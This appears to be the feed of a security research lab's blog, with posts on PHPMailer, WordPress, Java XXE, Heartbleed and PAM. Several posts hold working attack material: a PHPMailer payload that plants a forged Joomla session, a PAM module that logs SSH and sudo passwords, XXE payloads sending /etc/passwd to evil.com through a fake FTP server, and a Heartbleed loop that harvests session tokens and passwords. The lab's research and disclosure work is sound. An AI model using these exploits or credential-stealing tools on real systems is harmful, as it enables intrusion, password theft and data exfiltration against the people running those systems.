tag:blogger.com,1999:blog-71738431221985863932024-03-16T23:51:57.791-07:00@ONsec_LabOfficial ONsec research lab blogVladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.comBlogger24125tag:blogger.com,1999:blog-7173843122198586393.post-12511691774389841412017-01-02T12:29:00.003-08:002017-01-02T12:29:48.937-08:00Using PHPMailer vulnerability to take the session<div dir="ltr" style="text-align: left;" trbidi="on">
At the end of 2016 world was shocked by remote code execution exploit for PHPMailer. <div>
<br /></div>
<div>
It's a very common 3rd party library which used by Drupal, WordPress, Joomla and numbers of others top web projects.<div>
<br /></div>
<div>
<a href="https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html">PHPMailer <5.2.18 original vulnerability CVE-2016-10033</a></div>
<div>
<a href="https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html">PHPMailer <5.2.20 incorrect patch bypass CVE-2016-10045</a></div>
<div>
<br /></div>
<div>
The reason of this vulnerability is an incorrect data filtration in the email address while using it as a argument for the <b>sendmail</b> utility execution via system shell. As a result, remote attacker can upload arbitrary file by using <b>-X</b> argument.</div>
</div>
<div>
<br /></div>
<div>
Obvious way to exploit this is a web shell upload. However, it depends on two different requirements:</div>
<div>
<ol style="text-align: left;">
<li>Attacker should know full path to the web root directory (like /var/www)</li>
<li>Web application should have file system privileges to write into one of the web directories.</li>
</ol>
<div>
We suggest another one way to exploit this vulnerability with no described requirements. It's session file upload way. </div>
</div>
<div>
<br /></div>
<div>
For Joomla the exploit could looks like:</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$email_from = '"attacker\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0 some"@email.com';</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$msg_body = 'joomla|s:1572:"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aTo4O3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTQ4MzM4ODA2MztzOjQ6Imxhc3QiO2k6MTQ4MzM4ODEzNjtzOjM6Im5vdyI7aToxNDgzMzg4MzY1O31zOjU6InRva2VuIjtzOjMyOiJuWmx5ZFdYMUN4M1VnbjhRbWNLN0RnRGJNTkZBMVFkeSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo1OiJzZXR1cCI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo3OiJoZWxwdXJsIjtzOjc0OiJodHRwczovL2hlbHAuam9vbWxhLm9yZy9wcm94eS9pbmRleC5waHA/a2V5cmVmPUhlbHB7bWFqb3J9e21pbm9yfTp7a2V5cmVmfSI7czo3OiJvcHRpb25zIjthOjE1OntzOjk6InNpdGVfbmFtZSI7czoxNDoicnVzc2lhLXJlbGF0ZWQiO3M6MTE6ImFkbWluX2VtYWlsIjtzOjEyOiJhc2RAYXNkcy5jb20iO3M6MTA6ImFkbWluX3VzZXIiO3M6NToiYWRtaW4iO3M6MTQ6ImFkbWluX3Bhc3N3b3JkIjtzOjI4OiJydXNzaWEtcmVsYXRlZHJ1c3NpYS1yZWxhdGVkIjtzOjEzOiJzaXRlX21ldGFkZXNjIjtzOjA6IiI7czoxMjoic2l0ZV9vZmZsaW5lIjtpOjA7czo4OiJsYW5ndWFnZSI7czo1OiJlbi1VUyI7czo3OiJoZWxwdXJsIjtzOjc0OiJodHRwczovL2hlbHAuam9vbWxhLm9yZy9wcm94eS9pbmRleC5waHA/a2V5cmVmPUhlbHB7bWFqb3J9e21pbm9yfTp7a2V5cmVmfSI7czo3OiJkYl90eXBlIjtzOjY6Im15c3FsaSI7czo3OiJkYl9ob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo3OiJkYl91c2VyIjtzOjQ6InJvb3QiO3M6NzoiZGJfcGFzcyI7czoxMjoibXktc2VjcmV0LXB3IjtzOjc6ImRiX25hbWUiO3M6NDoidGVzdCI7czo2OiJkYl9vbGQiO3M6NjoiYmFja3VwIjtzOjk6ImRiX3ByZWZpeCI7czo2OiJwa2M2cV8iO319fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=";';</span></div>
<div>
<br /></div>
<div>
Then set the value f8af03562e674480401098254fe223e0 in Cookie and take a profit :)</div>
<div>
<br /></div>
<div>
Moreover, in Joomla case it's also serialized data inside this base64 body:</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":1:{s:9:"__default";O:8:"stdClass":3:{s:7:"session";O:8:"stdClass":3:{s:7:"counter";i:8;s:5:"timer";O:8:"stdClass":3:{s:5:"start";i:1483388063;s:4:"last";i:1483388136;s:3:"now";i:1483388365;}s:5:"token";s:32:"nZlydWX1Cx3Ugn8QmcK7DgDbMNFA1Qdy";}s:8:"registry";O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":0:{}s:14:"*initialized";b:1;s:9:"separator";s:1:".";}s:5:"setup";O:8:"stdClass":2:{s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"options";a:15:{s:9:"site_name";s:14:"russia-related";s:11:"admin_email";s:12:"asd@asds.com";s:10:"admin_user";s:5:"admin";s:14:"admin_password";s:28:"russia-relatedrussia-related";s:13:"site_metadesc";s:0:"";s:12:"site_offline";i:0;s:8:"language";s:5:"en-US";s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"db_type";s:6:"mysqli";s:7:"db_host";s:9:"127.0.0.1";s:7:"db_user";s:4:"root";s:7:"db_pass";s:12:"my-secret-pw";s:7:"db_name";s:4:"test";s:6:"db_old";s:6:"backup";s:9:"db_prefix";s:6:"pkc6q_";}}}}s:14:"*initialized";b:0;s:9:"separator";s:1:".";}</span></div>
</div>
<div>
<br /></div>
<div>
So, the attacker could also upgrade this to the RCE.</div>
<div>
<div>
<br /></div>
</div>
</div>
Ivan Novikovhttp://www.blogger.com/profile/00788355119529065721noreply@blogger.com87tag:blogger.com,1999:blog-7173843122198586393.post-37307181152213153162016-04-25T09:16:00.001-07:002016-04-25T09:16:15.365-07:00New PHP extensions should be hardcoded :)<div dir="ltr" style="text-align: left;" trbidi="on">
PHP 6 and PHP 7 are here.<br />
Many applications still using blacklist filtration for upload and other file operations files.<br />
Note, that now you should add <b>".php6"</b> and <b>".php7" </b>to this lists.<br />
<br />
Finally it will looks like:<br />
<blockquote class="tr_bq">
.php3<br />.php4<br />.php5<br />.php6<br />.php7<br />.phtm<br />.phtml<br />...</blockquote>
We are still recommend to use while lists to enumerate safe extensions.</div>
Ivan Novikovhttp://www.blogger.com/profile/00788355119529065721noreply@blogger.com198tag:blogger.com,1999:blog-7173843122198586393.post-26379783745543744372015-12-09T04:44:00.000-08:002015-12-09T04:44:08.371-08:00One more useful PHP class for unserialize() bugs<div dir="ltr" style="text-align: left;" trbidi="on">
In a hurry to share PHP common class for deserialization vulnerabilities.<br />
It's <a href="https://github.com/guzzle/guzzle/blob/master/src/Cookie/FileCookieJar.php">FileCookieJar class of Guzzle project</a>.<br />
<br />
Look at its destructor <a href="https://github.com/guzzle/guzzle/blob/master/src/Cookie/FileCookieJar.php#L37-L61">https://github.com/guzzle/guzzle/blob/master/src/Cookie/FileCookieJar.php#L37-L61</a>:<br />
<pre style="line-height: 125%; margin: 0;"><span style="color: #557799;"><?</span>
<span style="color: #008800; font-weight: bold;">public</span> <span style="color: #008800; font-weight: bold;">function</span> <span style="color: #0066bb; font-weight: bold;">__destruct</span>()
{
<span style="color: #996633;">$this</span><span style="color: #333333;">-></span><span style="color: #0000cc;">save</span>(<span style="color: #996633;">$this</span><span style="color: #333333;">-></span><span style="color: #0000cc;">filename</span>);
}
<span style="color: #dd4422;">/**</span>
<span style="color: #dd4422;"> * Saves the cookies to a file.</span>
<span style="color: #dd4422;"> *</span>
<span style="color: #dd4422;"> * @param string $filename File to save</span>
<span style="color: #dd4422;"> * @throws \RuntimeException if the file cannot be found or created</span>
<span style="color: #dd4422;"> */</span>
<span style="color: #008800; font-weight: bold;">public</span> <span style="color: #008800; font-weight: bold;">function</span> <span style="color: #0066bb; font-weight: bold;">save</span>(<span style="color: #996633;">$filename</span>)
{
<span style="color: #996633;">$json</span> <span style="color: #333333;">=</span> [];
<span style="color: #008800; font-weight: bold;">foreach</span> (<span style="color: #996633;">$this</span> <span style="color: #008800; font-weight: bold;">as</span> <span style="color: #996633;">$cookie</span>) {
<span style="color: #dd4422;">/** @var SetCookie $cookie */</span>
<span style="color: #008800; font-weight: bold;">if</span> (CookieJar<span style="color: #333333;">::</span><span style="color: #0000cc;">shouldPersist</span>(<span style="color: #996633;">$cookie</span>, <span style="color: #996633;">$this</span><span style="color: #333333;">-></span><span style="color: #0000cc;">storeSessionCookies</span>)) {
<span style="color: #996633;">$json</span>[] <span style="color: #333333;">=</span> <span style="color: #996633;">$cookie</span><span style="color: #333333;">-></span><span style="color: #0000cc;">toArray</span>();
}
}
<span style="color: #008800; font-weight: bold;">if</span> (<span style="color: #008800; font-weight: bold;">false</span> <span style="color: #333333;">===</span> <span style="color: #007020;">file_put_contents</span>(<span style="color: #996633;">$filename</span>, <span style="color: #007020;">json_encode</span>(<span style="color: #996633;">$json</span>))) {
<span style="color: #008800; font-weight: bold;">throw</span> <span style="color: #008800; font-weight: bold;">new</span> \RuntimeException(<span style="background-color: #fff0f0;">"Unable to save file </span><span style="background-color: #eeeeee;">{</span><span style="color: #996633;">$filename</span><span style="background-color: #eeeeee;">}</span><span style="background-color: #fff0f0;">"</span>);
}
}
<span style="color: #557799;">?></span>
</pre>
Who can construct valid exploit without hints? ;)<br />
It's easy.</div>
Ivan Novikovhttp://www.blogger.com/profile/00788355119529065721noreply@blogger.com47tag:blogger.com,1999:blog-7173843122198586393.post-26569049072665089442015-11-06T02:31:00.001-08:002015-11-06T02:31:09.195-08:00Increases the power of PAM steal module.<div dir="ltr" style="text-align: left;" trbidi="on">
A year ago we released our <a href="http://lab.onsec.ru/2014/07/pamsteal-plugin-released.html">PAM steal module</a>.<br />
It's easiest and safest way to steal passwords and local privilege escalation.<br />
<br />
Basically it catch passwords from sudo/su and local services which used PAM.<br />
But not SSH daemon by default.<br />
The fact that it uses the challenge-response authentication scheme. In this case password will be used to generate response (hash) on client side. And will not be going to server.<br />
<br />
To fix this "issue" you can edit sshd.conf to disable<br />
<blockquote class="tr_bq">
ChallengeResponseAuthentication<br /><span class="Apple-tab-span" style="white-space: pre;"> </span> Specifies whether challenge-response authentication is allowed<br /><span class="Apple-tab-span" style="white-space: pre;"> </span> (e.g. via PAM or though authentication styles supported in<br /><span class="Apple-tab-span" style="white-space: pre;"> </span> login.conf(5)) The<span class="Apple-tab-span" style="white-space: pre;"> </span>default<span class="Apple-tab-span" style="white-space: pre;"> </span>is ``yes''.</blockquote>
<a href="https://www.freebsd.org/cgi/man.cgi?query=sshd_config&sektion=5">https://www.freebsd.org/cgi/man.cgi?query=sshd_config&sektion=5</a><br />
<br />
That's all. Now all passwords from SSH will be logged as well as $su typed passwords.<br />
NOTICE! Please, use key-based auth anytime and sudo!</div>
Ivan Novikovhttp://www.blogger.com/profile/00788355119529065721noreply@blogger.com14tag:blogger.com,1999:blog-7173843122198586393.post-29938959984955189022014-09-05T08:07:00.002-07:002014-09-05T08:07:40.294-07:00WordPress 3.9.2- XXE through media upload (WAV ID3 tag)<div dir="ltr" style="text-align: left;" trbidi="on">
Recently WordPress patched XXE vulnerability <a href="http://wordpress.org/news/2014/08/wordpress-3-9-2/">http://wordpress.org/news/2014/08/wordpress-3-9-2/ </a>which were found during <a href="https://twitter.com/onsec_lab">@ONsec_lab</a> security audit of another one web-application.<br />
<br />
Now time to describe this vulnerability in details!<br />
<br />
The reason is <a href="https://github.com/JamesHeinrich/getID3/">GetID3</a> library which included into WordPress by default:<br />
./wp-includes/ID3/getid3.lib.php:<br />
521 public static function XML2array($XMLstring) {<br />
522 if (function_exists('simplexml_load_string')) {<br />
523 if (function_exists('get_object_vars')) {<br />
524 $XMLobject = <span style="color: red;"><b>simplexml_load_string</b></span>($XMLstring);<br />
<br />
Requires PHP 5.5.0- (simple_xml was patched to disable external entities since ~5.5.0)<br />
<br />
To use this vulnerability attacker must have privileges to upload Media (editor privileges for example).<br />
<br />
PoC is available at our GitHub repo: <a href="https://github.com/ONsec-Lab/scripts/blob/master/getid3-xxe.wav">https://github.com/ONsec-Lab/scripts/blob/master/getid3-xxe.wav</a><br />
<br />
<b>Timeline</b>:<br />
5/12/14 vendor notified<br />
5/15/14 vulnerability confirmed<br />
8/06/14 fixed at version 3.9.2</div>
Ivan Novikovhttp://www.blogger.com/profile/00788355119529065721noreply@blogger.com95tag:blogger.com,1999:blog-7173843122198586393.post-56982495733541632932014-07-18T06:24:00.001-07:002014-07-18T06:26:05.075-07:00PAM_steal plugin released<div dir="ltr" style="text-align: left;" trbidi="on">
Typically pentest’s attack can be presented by the following schema:<br />
<blockquote class="tr_bq">
perimeter -> command execution -> privileges escalation -> ...</blockquote>
The next step for pentesters is to gain privileges at other machines.<br />
For example, it can be done by stealing credentials (one of many methods).<br />
Passwords at local machine will be hashed and it's not so good to crack it due to the time.<br />
<br />
<a href="http://www.giac.org/paper/gsec/2034/conducting-ssh-man-middle-attacks-sshmitm/103515">SSH MITM</a> (tool: <a href="http://www.signedness.org/tools/mitm-ssh.tgz">http://www.signedness.org/tools/mitm-ssh.tgz</a>) is a good one. It should be noticed though that passwords can be shared between many services and thus is also necessary.<br />
<br />
<a href="http://en.wikipedia.org/wiki/Linux_PAM">PAM</a> (Pluggable Authentification Module) provide dynamic authorization for applications and services in a Linux system. Our password logger plugin for PAM can be found here: <a href="https://github.com/ONsec-Lab/scripts/tree/master/pam_steal">https://github.com/ONsec-Lab/scripts/tree/master/pam_steal</a><br />
<br />
This is a good point after rooting machines during penetration tests.<br />
<br />
Install process:<br />
<blockquote class="tr_bq">
./make.sh<br />
vim /etc/pam.d/common-auth<br />
add "auth required pam_steal.so" into it</blockquote>
Then check /tmp/.steal.log - all FTP/SSH and other PAM-based daemon's passwords will be there!</div>
Ivan Novikovhttp://www.blogger.com/profile/00788355119529065721noreply@blogger.com19tag:blogger.com,1999:blog-7173843122198586393.post-74364467991670101522014-06-23T04:49:00.002-07:002014-06-23T04:52:21.093-07:00XXE OOB exploitation at Java 1.7+<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
Java since 1.7 patched gopher:// schema (thanks A.Polyakov for that <a href="https://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf">https://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf</a>)</div>
<div>
But also patched HttpClient class.</div>
<div>
<br /></div>
<div>
Now Java doesn't convert multiline URIs by urlencode to valid one.</div>
<div>
<br /></div>
<div>
This fix produce "java.net.MalformedURLException: Illegal character in URL" exception when URL contains new lines and other command characters.</div>
<div>
<br /></div>
<div>
XXE payload:</div>
<blockquote class="tr_bq">
<pre style="background: rgb(255, 255, 255); font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #3a4a64;"><!<span style="color: #ff7800;">ENTITY</span> % b<span style="color: #ff7800;"> SYSTEM </span><span style="color: #409b1c;">"file:///tmp/"</span>>
<!<span style="color: #ff7800;">ENTITY</span> % c <span style="color: #409b1c;">"<!ENTITY <span style="color: #3b5bb5;">&#37;</span> rrr SYSTEM 'http://evil.com:8000/%b;'>"</span>>
<span style="color: #3b5bb5;">%c;</span></span></pre>
</blockquote>
<div>
XXE OOB attack technique first discovered at 2009 by T.Terada:</div>
<div>
<a href="http://d.hatena.ne.jp/teracc/20090718#1247918667">http://d.hatena.ne.jp/teracc/20090718#1247918667</a></div>
<div>
And rediscovered later by T.Yunusov and A.Osipov with additional features such as attribute entities</div>
<div>
<a href="https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf">https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf</a></div>
<div>
<br /></div>
<div>
Fill the difference:<br />
<br />
Java 1.7- :</div>
<div>
GET /.font-unix%0A.ICE-unix%0A.X11-unix%0AaprmovGRx%0Aasd%0AeTSrv%0Ahosts%0Alaunchd-277.sloRFO%0Alaunchd-492.s4PJbX%0Alaunchd-5486.ocD8IC%0Alaunchd-9800.eUprC8%0Alaunch-j7JvAs%0Alaunch-L6bUiQ%0Alaunch-WELXDr%0Apasswd%0Axxe.xml%0A HTTP/1.1</div>
<div>
User-Agent: Java/1.6.0_65</div>
<div>
...</div>
<div>
<br /></div>
<div>
Java 1.7+:</div>
<div>
nothing!</div>
<div>
Stack trace:</div>
<blockquote class="tr_bq">
<u><span style="color: blue;">java.net.MalformedURLException</span></u><span style="color: red;">: Illegal character in URL<br />at sun.net.www.http.HttpClient.getURLFile(HttpClient.java:583)<br />at sun.net.www.protocol.http.HttpURLConnection.getRequestURI(HttpURLConnection.java:2298)<br />at sun.net.www.protocol.http.HttpURLConnection.writeRequests(HttpURLConnection.java:513)<br />...<br />at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(XMLParser.java:141)<br />at com.sun.org.apache.xerces.internal.parsers.DOMParser.parse(DOMParser.java:243)<br />at com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderImpl.parse(DocumentBuilderImpl.java:347)</span></blockquote>
<div>
<br /></div>
<div>
This makes XXE OOB exploitation impossible.</div>
<div>
<br /></div>
<div>
We met this problem at security audit and solve it by using FTP and hacker's logic :) The main trick is that Java still have no URI validation in case of FTP.</div>
<div>
<br /></div>
<div>
Each line from multiline FTP URI will be requested as separate directory by CWD command. Each "/" char at line will be also separated to different CWD request.</div>
<div>
<br /></div>
<div>
For exploit it you need emulate FTP server of course.</div>
<div>
<i>git clone <a href="https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb">https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb</a></i></div>
<div>
<div>
<br /></div>
<div>
<pre style="background: rgb(255, 255, 255); font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #ff5600;">require</span> <span style="color: #00a33f;">'socket'</span>
server <span style="color: #ff5600;">=</span> <span style="color: #a535ae;">TCPServer</span>.<span style="color: #ff5600;">new</span> 8000
<span style="color: #ff5600;">loop</span> <span style="color: #ff5600;">do</span>
<span style="color: #a535ae;">Thread</span>.start(server.accept) <span style="color: #ff5600;">do </span>|client|
puts <span style="color: #00a33f;">"New client connected"</span>
data <span style="color: #ff5600;">=</span> <span style="color: #00a33f;">""</span>
client.puts(<span style="color: #00a33f;">"220 xxe-ftp-server"</span>)
<span style="color: #ff5600;">loop</span> {
req <span style="color: #ff5600;">=</span> client.gets()
puts <span style="color: #00a33f;">"< "</span><span style="color: #ff5600;">+</span>req
<span style="color: #ff5600;">if</span> req.include? <span style="color: #00a33f;">"USER"</span>
client.puts(<span style="color: #00a33f;">"331 password please - version check"</span>)
<span style="color: #ff5600;">else</span>
puts <span style="color: #00a33f;">"> 230 more data please!"</span>
client.puts(<span style="color: #00a33f;">"230 more data please!"</span>)
<span style="color: #ff5600;">end</span>
}
<span style="color: #ff5600;">end</span>
<span style="color: #ff5600;">end</span></pre>
</div>
</div>
<div>
<br /></div>
<div>
You can also put payload into username or password like this:</div>
<blockquote class="tr_bq">
<pre style="background: rgb(255, 255, 255); font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #3a4a64;"><!<span style="color: #ff7800;">ENTITY</span> % c <span style="color: #409b1c;">"<!ENTITY <span style="color: #3b5bb5;">&#37;</span> rrr SYSTEM 'ftp://%b;:aaa@evil.com:8000/'>"</span>></span></pre>
</blockquote>
<div>
or</div>
<blockquote class="tr_bq">
<pre style="background: rgb(255, 255, 255); font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #3a4a64;"><!<span style="color: #ff7800;">ENTITY</span> % c <span style="color: #409b1c;">"<!ENTITY <span style="color: #3b5bb5;">&#37;</span> rrr SYSTEM 'ftp://aaa:%b;@evil.com:8000/'>"</span>></span></pre>
</blockquote>
<div>
And retrieve all data in only one request. But in this case you can not read files with ":" char (such as /etc/passwd) because:</div>
<blockquote class="tr_bq">
<span style="color: blue;"><u>java.net.MalformedURLException</u></span><span style="color: red;">: For input string: "x:0:0:root:"<br />at java.net.URL.<init>(URL.java:619)<br />at java.net.URL.<init>(URL.java:482)<br />at java.net.URL.<init>(URL.java:431)</span></blockquote>
<div>
<br /></div>
<div>
Finally got something like this: </div>
<div>
<br /></div>
<div>
XXE payload: </div>
<blockquote class="tr_bq">
<pre style="background: rgb(255, 255, 255); font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #3a4a64;"><?xml version=<span style="color: #409b1c;">"1.0"</span>?></span>
<span style="color: #3a4a64;"><!<span style="color: #ff7800;">DOCTYPE</span> a [
<!<span style="color: #ff7800;">ENTITY</span> % asd<span style="color: #ff7800;"> SYSTEM </span><span style="color: #409b1c;">"http://evil.com/ext.dtd"</span>>
<span style="color: #3b5bb5;">%asd;</span>
<span style="color: #3b5bb5;">%rrr;</span>
]></span>
<span style="color: #3a4a64;"><a></a></span></pre>
</blockquote>
<div>
External DTD payload (hosted at http://evil.com/ext.dtd):</div>
<blockquote class="tr_bq">
<pre style="background: rgb(255, 255, 255); font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #3a4a64;"><!<span style="color: #ff7800;">ENTITY</span> % b<span style="color: #ff7800;"> SYSTEM </span><span style="color: #409b1c;">"file:///etc/passwd"</span>>
<!<span style="color: #ff7800;">ENTITY</span> % c <span style="color: #409b1c;">"<!ENTITY <span style="color: #3b5bb5;">&#37;</span> rrr SYSTEM 'ftp://evil.com:8000/%b;'>"</span>></span></pre>
</blockquote>
<div>
$ ruby xxe-ftp-server.rb</div>
<blockquote class="tr_bq">
New client connected<br />
< USER anonymous<br />
< PASS Java1.7.0_45@<br />
> 230 more data please!<br />
< TYPE I<br />
> 230 more data please!<br />
< CWD <span style="color: red;"><b>root:x:0:0:root:</b></span><br />
> 230 more data please!<br />
< CWD <span style="color: red;"><b>root:</b></span><br />
> 230 more data please!<br />
< CWD <span style="color: red;"><b>bin</b></span><br />
> 230 more data please!<br />
< CWD <span style="color: red;"><b>bash</b></span><br />
> 230 more data please!<br />
< <span style="color: red;"><b>daemon:x:1:1:daemon:</b></span></blockquote>
<div>
...</div>
<div>
root:x:0:0:root:/root:/bin/bash -----/*slash separation*/-----> root:x:0:0:root: root: bin bash</div>
</div>
Ivan Novikovhttp://www.blogger.com/profile/00788355119529065721noreply@blogger.com430tag:blogger.com,1999:blog-7173843122198586393.post-59702205488410809062014-04-08T10:04:00.003-07:002014-04-08T10:05:30.574-07:00Memory dumper based on CVE-2014-0160<div dir="ltr" style="text-align: left;" trbidi="on">
You already know about this bug of course:<br />
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160<br />
<br />
Just easy patch to original PoC: https://gist.github.com/ixs/10116537<br />
<br />
<pre><span style="color: #008c00;"> 60</span> <span style="color: maroon; font-weight: bold;">def</span> hexdump<span style="color: #808030;">(</span>s<span style="color: #808030;">)</span><span style="color: #808030;">:</span>
<span style="color: #008c00;">61</span> r <span style="color: #808030;">=</span> <span style="color: #0000e6;">r"((sid|token|sess|pass|basic|oauth).*)"</span>
<span style="color: #008c00;">62</span> m <span style="color: #808030;">=</span> re<span style="color: #808030;">.</span>findall<span style="color: #808030;">(</span>r<span style="color: #808030;">,</span>s<span style="color: #808030;">)</span>
<span style="color: #008c00;">63</span> <span style="color: maroon; font-weight: bold;">print</span> m
<span style="color: #008c00;">64</span> sys<span style="color: #808030;">.</span><span style="color: #e34adc;">exit</span><span style="color: #808030;">(</span><span style="color: #808030;">)</span></pre>
<div style="text-align: left;">
<span style="font-family: Times; white-space: normal;">And some bash now:</span></div>
<pre>~$ while true; do ./ssltest.py company.com >> regexped; done</pre>
<pre></pre>
<pre><span style="font-family: Times;"><span style="white-space: normal;">
</span></span></pre>
<pre><span style="font-family: Times;"><span style="white-space: normal;">We have plans to rewrite this PoC to use only one socket for multiple dumps.</span></span></pre>
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com255tag:blogger.com,1999:blog-7173843122198586393.post-34709066932194414582013-09-12T05:17:00.000-07:002013-09-12T05:17:54.758-07:00The mobile application's role in web application security audits<div dir="ltr" style="text-align: left;" trbidi="on">
Modern web projects have also mobile applications.<br />
In terms of client-side model, mobile application is a client, like a browser.<br />
Server is web application: PHP/Java/RoR or another platform's code.<br />
<br />
Mobile applications interact with the server just like a browser, because HTTP(S) protocol are very common.<br />
<br />
Thus, when we talk about security audit of web application as a server application code, we must also carry out a security checks of the parts that interact with mobile applications, not just those which interact with browsers.<br />
<br />
In order to understand how mobile application communicates with application server, which sends requests (which uses urls, parameters), it is necessary to explore mobile app.<br />
<br />
The most simple and reliable way for this purpose is to intercept the traffic on the same network that mobile application uses to send requests to application server. This may be a wi-fi or your network card, if the application is run in the emulator.<br />
<br />
But recently, we have found another easier way to collect references left in the code by developers of mobile applications. This method is an excellent complement to the first option with the interception of traffic.<br />
<br />
Free online service <a href="http://hackapp.com/">hackapp.com</a> allows you to perform a safety check of mobile apps for iOS including collecting links within mobile applications.<br />
<br />
A few examples:<br />
<a href="http://hackapp.com/open#8f311762063d536ca6353b3b5ab4d02d">http://hackapp.com/open#8f311762063d536ca6353b3b5ab4d02d</a><br />
Samsung mobile print application:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheDp0vRnWv1dXPJgwC3h7uTH1c41ZfhZ-lCiALm96CZSHBs-x2sJHACDFn5cjGzVqGZ4NJNcnCxzIca6BAWSHgXletdOq1nlWaT0qDimaHniJ0kYeqkqX_vUNUzGqQtcYdiG1vRartBog/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-09-12+%D0%B2+15.25.11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheDp0vRnWv1dXPJgwC3h7uTH1c41ZfhZ-lCiALm96CZSHBs-x2sJHACDFn5cjGzVqGZ4NJNcnCxzIca6BAWSHgXletdOq1nlWaT0qDimaHniJ0kYeqkqX_vUNUzGqQtcYdiG1vRartBog/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-09-12+%D0%B2+15.25.11.png" /></a></div>
<br />
<br />
This information also can help auditors during penetrations testing.<br />
<br />
But sometimes this service surprises us with a startling discovery, for example, private keys!<br />
<a href="http://hackapp.com/open#e9e5b174f4955cb4993fbf3393460005">http://hackapp.com/open#e9e5b174f4955cb4993fbf3393460005</a><br />
Samsung (again) SmartTangoTalk application:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht8OcHQfKuBnKBat1jX6x7d35BCeY9c3PSgRmFse985sqRMwx42Pv82nz7kCr70tHc4rNbXiBG1Y3IOQuDZmP9aZtvDiIvoG2tHqK3VllVZr0bhw-l4h9ryqyFf32Tb-DIOgnBNnixNIY/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-09-12+%D0%B2+15.29.26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht8OcHQfKuBnKBat1jX6x7d35BCeY9c3PSgRmFse985sqRMwx42Pv82nz7kCr70tHc4rNbXiBG1Y3IOQuDZmP9aZtvDiIvoG2tHqK3VllVZr0bhw-l4h9ryqyFf32Tb-DIOgnBNnixNIY/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-09-12+%D0%B2+15.29.26.png" /></a></div>
Enjoy!</div>
